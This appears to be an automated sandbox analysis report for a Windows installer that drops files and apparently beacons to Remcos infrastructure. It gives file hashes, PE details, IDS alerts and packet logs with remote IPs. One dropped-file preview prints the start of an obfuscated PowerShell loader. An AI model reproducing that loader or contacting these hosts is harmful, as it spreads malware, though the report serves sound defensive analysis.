                                    SHA-256:99EECD9B8808E7B171AE3B9E08B1EFE75CBA0BAFDE4ECF1D240A2BA1F28EC637
                                    SHA-512:C6AAE8D60B43A7D7D1C287F70D91B35E914B0B4C53449B34D3E9D773C7909395755D9266FC4BA88648BC4E94614E550877D1DF54CB7547274D3EEA35ECFAA910
                                    Malicious:false
                                    Preview:........].........................................................$.....$.........................................................................................(..........................................................9..........................s...............................................................................................................................................................................A............................................................~................................F...B........s.....................................X...?.....................M.......................I..................................................................................................SJ............3.K.......M.........................................................................................................................................................7....._.................................E............................................K..................

                                    C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene\dumrians.und

                                    Download File
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):413966
                                    Entropy (8bit):1.2545701143598162
                                    Encrypted:false
                                    SSDEEP:1536:b2T3E/ySYfBk8nalEPTUh6Va4fPKCPdsqNQj:ij9fBk8alsUhH8js6c
                                    MD5:2563D98DE6469D9979963EFD8D66736D
                                    SHA1:4D98E68617BE777AB97514BDF59CA98AA1102C5F
                                    SHA-256:B7423FE1148A2EA0E5BDE3855DFAB272400202AD01A2402F76E6E5F7DD5E0AE5
                                    SHA-512:C3FDB8870482B6C1A08A3088ED4539746E4F5DFAF63C8AD5F7B7873D2F3FC4FE8945493888422C487F5DB1E216A289A431890E6100A1A10C4ED6BCB2DD8CBBA4
                                    Malicious:false
                                    Preview:.....c.........../..............................u.....................................................................................h......2...............................................*...l...........................;.....................n......a......................I...........................x.;...............................................................................................................................................M....................._...............................................................+...c.....;.j........................................2.........................................................I......................................o..........d.........A.....4.....................r..........................p...........................................................T........................................................................L.......................................................G.............................,.....................

                                    C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Ukr.txt

                                    Download File
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:ASCII text, with very long lines (359), with no line terminators
                                    Category:dropped
                                    Size (bytes):359
                                    Entropy (8bit):4.308814426836422
                                    Encrypted:false
                                    SSDEEP:6:BSX8gnAA04KQeCVNcTKwLD3YAP7bqJINNQUmAdlvKRScZRIOrSeNRRAAefDPJzMA:wdAAMAszL8vJaNFmO0RSGDHRCNYR02yR
                                    MD5:2F193BC3BEEF5356ACF62CB12C2C4EF8
                                    SHA1:6E868DFB3D7ACB1D2C56E0EFA292CD7CF0DEC661
                                    SHA-256:10F1E86374C489E6FFC58B8213423687440ADDC3E483F5C84BE1F34D5DA23754
                                    SHA-512:4D5A2B7BD1C9A034A9A481BAA6C6D5D530AF5B3F95C8B1028C4DAB96FFA6199071E30CF1EB462B790AC845AA8BEAE34A0800741FBAC10242A3F38904593200EB
                                    Malicious:false
                                    Preview:succesforfattere homogamous monkeyishly funktionsstarts phylactolaemata.sextodecimos danmarkspremiere marrietta ancience.brisks grippelike hulebeboere flovmnds retrterne,roxbury marmorgulvets apogamic delprogrammers pips,selvglad polyhistorian flunkeyish deklasserings gidjee regnskabsinformationens,plasma anstandsdamernes pompejansk afmnstre afstbningernes,

                                    C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa

                                    Download File
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:ASCII text, with very long lines (57490), with no line terminators
                                    Category:dropped
                                    Size (bytes):57490
                                    Entropy (8bit):5.299568461510008
                                    Encrypted:false
                                    SSDEEP:1536:Ag8ORXWpDoT1NgkxLI7YmwDFwkim9iwRujs:Ag9T1SkWY32kVMs
                                    MD5:21F8B55EFF5453C6E94223B12647704A
                                    SHA1:8938162C626C171D76F37DEEBC2534E53D1870ED
                                    SHA-256:6D09C0544B4419FF08386626E6609B03036C999DA12AFB6AD3F1BEB2673C0894
                                    SHA-512:E87A707EDC2147A63E49900446CDF3EAAB287B71B1EA0779A2DC4D696B543692B8E9D85E510B8343F0083F25F8DF8349CE68010FEC40029D6E09151A98FA92F3
                                    Malicious:true
                                    Preview:$Endevendte=$Stemplingitheism;<#Arbejdssteder Solubilization Teat Nonrelativity #><#Centerbutikker Smaakrybets Glosserede Buksen Bagklogskabs Statusoptllingens Afgangshaller #><#Sadisten Pequot Hvisk Repress #><#Rnenes Aspargesbenets Lskbe Cableless Kumbaloi Ekstraudgavens Truismernes #><#Unnegated Tiremaid Autismens Heresies #><#Saccharonate Elefantsygdomme Indehiscent Asfaltens Gomer Quids #>$gennemsejle = " Toll;Disob`$InspeCTinseaFi,mdmDecrepKl ssiov rcnA tikgStr apIn.isl SkeeaSpiridBill,s Opkae S aarOverfnUn.uleSwellsPokun=Sierr`$Inwe SUnda p ilmil leaviMedvitCountnLoddei Parin mblyg .rkneChronr lammn Ty kePostfsGrade2Melod3Genop2Bookk; LuxmfRundiuBerignEkstrcAp rotCuy.pi.rsinoByplanNondr ConfeLVatera S.tegSkrmteBaronrCrotapVildmlcellua genidSparrs Spise Codir.nfornConceeOrdin1Fonde9Flyve7Sa,am Kalib(Kaiak`$ H,koFLiqu o Gum rGy nasWit hisyv rm lagepPlastlReacqe In,ed,ongeeAccomsStemm,Skuml`$StatuS Dobbt assaeDa,rymHovm pRetsplSpiloi C rdn IntegExact)Sur,e Ektex{,verl.Copro`$HeresA

                                    C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Tribades.vir

                                    Download File
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):257970
                                    Entropy (8bit):1.256808441775652
                                    Encrypted:false
                                    SSDEEP:1536:KcEgmiyf7PGBgwWjC81son6i0q8s0If3y:WDLGoB0q8K3
                                    MD5:9F966EC38C037968BA52C7C6A58EAED1
                                    SHA1:31BC370E88A2A10950D4C3AE24C28DF7E2D89868
                                    SHA-256:B4B70294B142D598F5E391EE8D371014C4AEFA8272754CE0094A8F802ADFA1DA
                                    SHA-512:6DE9F14B990B44336B01DF665F6D1C46B6076C10F1CC40D45DAA009110D9BA51E871599422E486E7264FE251EC560E9922CB959DAE6C6B12CC8B6AF6D720C581
                                    Malicious:false
                                    Preview:..|.....K.............................................................................................{...................................................(......................A............M......................(........W...t..............e............................................................<.....................................................................s.............................................................................................................................L.............................B............/............................................................../..............................w..[......................_.............................................................................T.............o.(....%.........................................n.........J.....................................E.....=...............................................................B......................................y...................................k....

                                    C:\Windows\brandbombernes.lnk

                                    Download File
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                    Category:dropped
                                    Size (bytes):1228
                                    Entropy (8bit):3.1240329365347503
                                    Encrypted:false
                                    SSDEEP:24:8VLDaRMgKkICFl9afr8WLJQlFw49HAvqy:8tmRPICX9afHJQ3wiASy
                                    MD5:258C061BB78A2284DFDB9203CE07908D
                                    SHA1:2F8F8FAB83C2CB6DE9C7CA1892C7BA9F56E05CD8
                                    SHA-256:55C70FCDD11D5A5A486368B8317D64DC1EED857E58B8F1ADE4555A5B54CBAE6E
                                    SHA-512:C7994CD9535FA32709434723B44278E182193D97D748661705A77C4F78A0008AFC640F8595085915C3209E2AF834A0958EDC02DDE661E893012BC963E37681C5
                                    Malicious:false
                                    Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....b.1...........nsy4F91.tmp.H............................................n.s.y.4.F.9.1...t.m.p.....\.2...........cueca.Stu.D............................................c.u.e.c.a...S.t.u.......7.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.y.4.F.9.1...t.m.p.\.c.u.e.c.a...S.t.u.a.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.c.e.s.s.i.o.n.a.t.e.\.F.a.v.o.u.r.a.b.l.i.e.s.1.1.7.\.s.u.l.f.o.n.y.l.u.r.e.a.\.H.y.p.e.r.t.r.a

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):6.308705975745299
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:SDWLLRJcsY.exe
                                    File size:995'120 bytes
                                    MD5:7bd1cce43f6b48c8ddd492e5711fd17f
                                    SHA1:3f650d8993c542682aa61c725ea1bb4ee93d259a
                                    SHA256:c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b
                                    SHA512:fe804b78cd734192664366364b099a5676d58101b9fe03c40c925cfe1cc202a99e04094d0fa93338ed831015d7ccd2ede88f04ab3cf6410542853a5a228face2
                                    SSDEEP:12288:5Ly0SryvXRpHnez0SBkasZa0kITLwn096zdZEkINz3WSV3:5Ly0SG/zHMBbsZadi80qZgNz3R
                                    TLSH:5F25F1663178B0CAE456D6351BC4D229A1B4BD782A43926FF3507FFF76BC6469E00342
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*.....

                                    File Icon

                                    Icon Hash:71ec71330f4c2a18

                                    Static PE Info

                                    General

                                    Entrypoint:0x40333d
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x59759527 [Mon Jul 24 06:35:19 2017 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:b34f154ec913d2d2c435cbd644e91687

                                    Authenticode Signature

                                    Signature Valid:false
                                    Signature Issuer:CN="galea Liniefring ", E=Counterreprisal@commutableness.Hea, L=Saint-Hilaire-le-Grand, S=Grand Est, C=FR
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 10/09/2024 09:37:23 10/09/2027 09:37:23
                                    Subject Chain
                                    • CN="galea Liniefring ", E=Counterreprisal@commutableness.Hea, L=Saint-Hilaire-le-Grand, S=Grand Est, C=FR
                                    Version:3
                                    Thumbprint MD5:95094CFBC63950E622AF1DFA6E758BD4
                                    Thumbprint SHA-1:48CE990AD29052E08E3200782F14F6B1EA0BAF7B
                                    Thumbprint SHA-256:A894E260F24722C1EEAF481A679E2D1375BE7D492C7C40DA2FF499E39ECAD2D0
                                    Serial:25BB7BE24444D924A0C091C26ACFC904CB17432E

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push esi
                                    push edi
                                    push 00000020h
                                    pop edi
                                    xor ebx, ebx
                                    push 00008001h
                                    mov dword ptr [esp+14h], ebx
                                    mov dword ptr [esp+10h], 0040A2E0h
                                    mov dword ptr [esp+1Ch], ebx
                                    call dword ptr [004080A8h]
                                    call dword ptr [004080A4h]
                                    and eax, BFFFFFFFh
                                    cmp ax, 00000006h
                                    mov dword ptr [0042A20Ch], eax
                                    je 00007FC3A8C1CB43h
                                    push ebx
                                    call 00007FC3A8C1FDD9h
                                    cmp eax, ebx
                                    je 00007FC3A8C1CB39h
                                    push 00000C00h
                                    call eax
                                    mov esi, 004082B0h
                                    push esi
                                    call 00007FC3A8C1FD53h
                                    push esi
                                    call dword ptr [00408150h]
                                    lea esi, dword ptr [esi+eax+01h]
                                    cmp byte ptr [esi], 00000000h
                                    jne 00007FC3A8C1CB1Ch
                                    push 0000000Ah
                                    call 00007FC3A8C1FDACh
                                    push 00000008h
                                    call 00007FC3A8C1FDA5h
                                    push 00000006h
                                    mov dword ptr [0042A204h], eax
                                    call 00007FC3A8C1FD99h
                                    cmp eax, ebx
                                    je 00007FC3A8C1CB41h
                                    push 0000001Eh
                                    call eax
                                    test eax, eax
                                    je 00007FC3A8C1CB39h
                                    or byte ptr [0042A20Fh], 00000040h
                                    push ebp
                                    call dword ptr [00408044h]
                                    push ebx
                                    call dword ptr [004082A0h]
                                    mov dword ptr [0042A2D8h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 000002B4h
                                    push eax
                                    push ebx
                                    push 004216A8h
                                    call dword ptr [00408188h]
                                    push 0040A2C8h

                                    Rich Headers

                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x6c2d0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xf25580x9d8
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x626d0x6400b2dd5d917f94d75528a11411abe5681cFalse0.6569921875data6.423132440637118IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xa0000x203180x600c46c24ddc9bf88a6774bd207204164b9False0.4921875data3.906531854842304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x2b0000x310000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x5c0000x6c2d00x6c4004f3d39c7e86d8cf2186d2c5dc01043a3False0.22987559540993072data3.0219143577609104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x5c4780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.18922167648016097
                                    RT_ICON0x9e4a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.24856559801253994
                                    RT_ICON0xaecc80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.29340971200336347
                                    RT_ICON0xb81700x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.31090573012939005
                                    RT_ICON0xbd5f80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.30196032120925836
                                    RT_ICON0xc18200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3432572614107884
                                    RT_ICON0xc3dc80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.36843339587242024
                                    RT_ICON0xc4e700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.4906716417910448
                                    RT_ICON0xc5d180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6137184115523465
                                    RT_ICON0xc65c00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3
                                    RT_ICON0xc6c280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3764450867052023
                                    RT_ICON0xc71900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4920212765957447
                                    RT_ICON0xc75f80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.3897849462365591
                                    RT_ICON0xc78e00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5135135135135135
                                    RT_DIALOG0xc7a080x100dataEnglishUnited States0.5234375
                                    RT_DIALOG0xc7b080x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0xc7c280xc4dataEnglishUnited States0.5918367346938775
                                    RT_DIALOG0xc7cf00x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0xc7d500xcadataEnglishUnited States0.6237623762376238
                                    RT_VERSION0xc7e200x16cdataEnglishUnited States0.5769230769230769
                                    RT_MANIFEST0xc7f900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                    Imports

                                    DLLImport
                                    KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-09-25T16:01:27.983317+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.464858185.26.107.5780TCP
                                    2024-09-25T16:01:30.828582+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.464860107.173.4.162404TCP
                                    2024-09-25T16:01:32.079186+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.464861178.237.33.5080TCP
                                    2024-09-25T16:01:32.094273+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.464862107.173.4.162404TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 25, 2024 16:01:27.339128971 CEST6485880192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:27.344007015 CEST8064858185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:27.344082117 CEST6485880192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:27.344324112 CEST6485880192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:27.349117041 CEST8064858185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:27.983258963 CEST8064858185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:27.983282089 CEST8064858185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:27.983316898 CEST6485880192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:27.983360052 CEST6485880192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:27.983561039 CEST6485880192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:27.988339901 CEST8064858185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:27.993041039 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:27.993088961 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:27.993160963 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:28.013062954 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:28.013081074 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:28.664256096 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:28.664370060 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:28.747118950 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:28.747159004 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:28.747524023 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:28.748568058 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:28.752832890 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:28.795430899 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.029697895 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.029725075 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.029742002 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.029880047 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.029901028 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.029983044 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.031088114 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.031104088 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.031220913 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.031230927 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.035407066 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.119673967 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.119700909 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.119779110 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.119792938 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.119841099 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.121660948 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.121680975 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.121803999 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.121803999 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.121812105 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.122613907 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.122632980 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.122675896 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.122683048 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.122745037 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.122745037 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.124519110 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.124546051 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.124603987 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.124609947 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.125325918 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.210115910 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.210140944 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.210228920 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.210242033 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.210279942 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.210299015 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.211791992 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.211808920 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.211963892 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.211971998 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212059975 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.212683916 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212699890 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212748051 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212754965 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.212759972 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212788105 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212804079 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.212810993 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212851048 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.212851048 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.213463068 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.213476896 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.213529110 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.213535070 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.213782072 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.214307070 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.214322090 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.214369059 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.214375019 CEST44364859185.26.107.57192.168.2.4
